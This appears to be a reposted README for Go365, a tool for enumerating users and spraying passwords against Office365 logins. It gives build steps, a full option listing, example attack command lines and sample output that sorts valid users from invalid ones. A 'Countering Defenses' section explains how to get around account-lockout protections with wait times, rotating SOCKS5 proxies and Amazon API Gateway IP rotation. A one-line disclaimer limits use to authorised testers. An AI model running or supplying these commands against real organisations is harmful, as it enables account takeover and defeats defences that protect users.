Security Tools

Go365 – An Office365 User Attack Tool

Go365 - An Office365 User Attack Tool

[sc name=”ad_1″]

Go365 is a tool designed to perform user enumeration* and password guessing attacks on organizations that use Office365 (now/soon Microsoft365). Go365 uses a unique SOAP API endpoint on login.microsoftonline.com that most other tools do not use. When queried with an email address and password, the endpoint responds with an Azure AD Authentication and Authorization code. This code is then processed by Go365 and the result is printed to screen or an output file.

* User enumeration is performed in conjunction with a password guess attempt. Thus, there is no specific flag or funtionality to perform only user enumeration. Instead, conduct your first password guessing attack, then parse the results for valid users.

Read these three bullets!

  • This tool might not work on all domains that utilize o365. Tests show that it works with most federated domains. Some domains will only report valid users even if a valid password is also provided. Your results may vary!
  • The domains this tool was tested on showed that it did not actually lock out accounts after multiple password failures. Your results may vary!
  • This tool is intended to be used by security professionals that are authorized to “attack” the target organization’s o365 instance.

Obtaining

Option 1

Download a pre-compiled binary for your OS HERE.

Option 2

Download the source and compile locally.

  1. Install Go.
  2. Go get some packages:
go get github.com/beevik/etree
go get github.com/fatih/color
go get golang.org/x/net/proxy
  1. Clone the repo.
  2. Navigate to the repo and compile ya dingus.
go build Go365.go
  1. Run the resulting binary and enjoy πŸ™‚

Usage

$ ./Go365 -h
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€ƒ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€ƒ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€ƒ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ
β–ˆβ–ˆβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒ β€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ–ˆβ–ˆβ€ƒβ–ˆβ–ˆβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒ β–ˆβ–ˆ
β–ˆβ–ˆβ€ƒ β–ˆβ–ˆβ–ˆβ€ƒ β–ˆβ–ˆβ–ˆβ–ˆβ€ƒβ€ƒ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€ƒβ€ƒβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€ƒ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ
β–ˆβ–ˆβ€ƒ β–ˆβ–ˆβ€ƒβ–ˆβ–ˆβ€ƒ β–ˆβ–ˆβ€ƒ β€ƒβ€ƒβ€ƒβ€ƒβ–ˆβ–ˆβ€ƒβ–ˆβ–ˆβ€ƒβ€ƒβ€ƒβ€ƒβ–ˆβ–ˆβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ–ˆβ–ˆ
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β€ƒβ€ƒβ€ƒβ–ˆβ–ˆβ–ˆβ–ˆβ€ƒβ€ƒβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€ƒβ€ƒβ€ƒβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€ƒβ€ƒβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ
Version: 0.2
Authors: h0useh3ad, paveway3, S4R1N, EatonChips
This tool is currently in development.
Usage:
./Go365 -ul <userlist> -p <password> -d <domain> [OPTIONS]
Options:
-h, Show this stuff
Required:
-u string Username to use
- Username with or without "@domain.com"
(-u legit.user)
-ul <file> Username list to use
- File should contain one username per line
- Usernames can have "@domain.com"
- If no domain is specified, the -d domain is used
( -ul ./usernamelist.txt)
-p <string> Password to attempt
- Enclose in single quotes if it contains special characters
(-p password123 OR -p 'p@s$w0|2d')
-pl <file> Password list to use
- File should contain one password per line
- Must be used with -delay
(-pl ./passwordlist.txt)
-up <file> Userpass list to use
- One username and password separated by a ":" per line
- Be careful of duplicate usernames!
(-up ./userpasslist.txt)
-d <string> Domain to test
(-d testdomain.com)
Optional:
-w <int> Time to wait between attempts in seconds.
- Default: 1 second. 5 seconds recommended.
(-w 10)
-delay <int> Delay (in seconds) between sprays when using a password list.
- Default: 10 minutes. 60 minutes (3600 seconds) recommended.
(-delay 600)
-o <string> Output file to write to
- Will append if file exists, otherwise a file is created
(-o ./output.out)
-proxy <string> Single proxy server to use
- IP address and Port separated by a ":"
- Has only been tested using SSH SOCKS5 proxies
(-proxy 127.0.0.1:1080)
-proxyfile <string> A file with a list of proxy servers to use
- IP address and Port separated by a ":" on each line
- Randomly selects a proxy server to use before each request
- Has only been tested using SSH SOCKS5 proxies
(-proxyfile ./proxyfile.txt)
-url <string> Endpoint to send requests to
- Amazon API Gateway 'Invoke URL'
(-url https://k62g98dne3.execute-api.us-east-2.amazonaws.com/login)
-debug Debug mode.
- Print xml response

Examples

./Go365 -ul ./user_list.txt -p 'coolpasswordbro!123' -d pwnthisfakedomain.com
./Go365 -ul ./user_list.txt -p 'coolpasswordbro!123' -d pwnthisfakedomain.com -w 5
./Go365 -up ./userpass_list.txt -d pwnthisfakedomain.com -w 5 -o Go365output.txt
./Go365 -u [email protected] -p 'coolpasswordbro!123' -w 5 -o Go365output.txt -proxy 127.0.0.1:1080
./Go365 -u legituser -pl ./pass_list.txt -delay 1800 -d pwnthisfakedomain.com -w 5 -o Go365output.txt -proxyfile ./proxyfile.txt
./Go365 -ul ./user_list.txt -p 'coolpasswordbro!123' -d pwnthisfakedomain.com -w 5 -o Go365output.txt -url https://k62g98dne3.execute-api.us-east-2.amazonaws.com/login

Account Locked Out! (Domain Defenses)

protip: You probably aren’t actually locking out accounts.

After a number of queries against a target domain, results might start reporting that accounts are locked out.

Once this defense is triggered, user enumeration becomes unreliable since requests for valid and invalid users will randomly report that their accounts have been locked out.

...
[-] User not found: [email protected]
[-] User not found: [email protected]
[-] Valid user, but invalid password: [email protected]
[!] Account Locked Out: [email protected]
[-] Valid user, but invalid password: [email protected]
[!] Account Locked Out: [email protected]
[!] Account Locked Out: [email protected]
[-] Valid user, but invalid password: [email protected]
[-] Valid user, but invalid password: [email protected]
[!] Account Locked Out: [email protected]
...

This is a defensive mechanism triggered by the number of valid user queries against the target domain within a certain period of time. The number of attempts and the period of time will vary depending on the target domain since the thresholds can be customized by the target organization.

Countering Defenses

Wait time

The defensive mechanism is time and IP address based. Go365 provides options to include a wait time between requests and proxy options to distribute the source of the requests. To circumvent the defensive mechanisms on your target domain, use a long wait time and multiple proxy servers.

A wait time of AT LEAST 15 seconds is recommended. -w 15

SOCKS5 Proxies

If you still get “account locked out” responses, start proxying your requests. Proxy options have only been tested on SSH SOCKS5 dynamic proxies (ssh -D <port> user@proxyserver)

Create a bunch of SOCKS5 proxies on DO or AWS or Vultr or whatever and make a file that looks like this:

127.0.0.1:8081
127.0.0.1:8082
127.0.0.1:8083
127.0.0.1:8084
127.0.0.1:8085
127.0.0.1:8086
...

The tool will randomly iterate through the provided proxy servers and wait for the specified amount of time between requests.

-w 15 -proxyfile ./proxies.txt

Amazon API Gateway

Additionally, an endpoint url may be specified so this tool can interface with Amazon API Gateway. Setup a gateway to point to the https://login.microsoftonline.com/rst2.srf endpoint, then set the -url parameter to the provided Invoke URL. Your IP should be rotated with each request.

-url https://k62g98dne3.execute-api.us-east-2.amazonaws.com/login


[sc name=”ad-in-article”]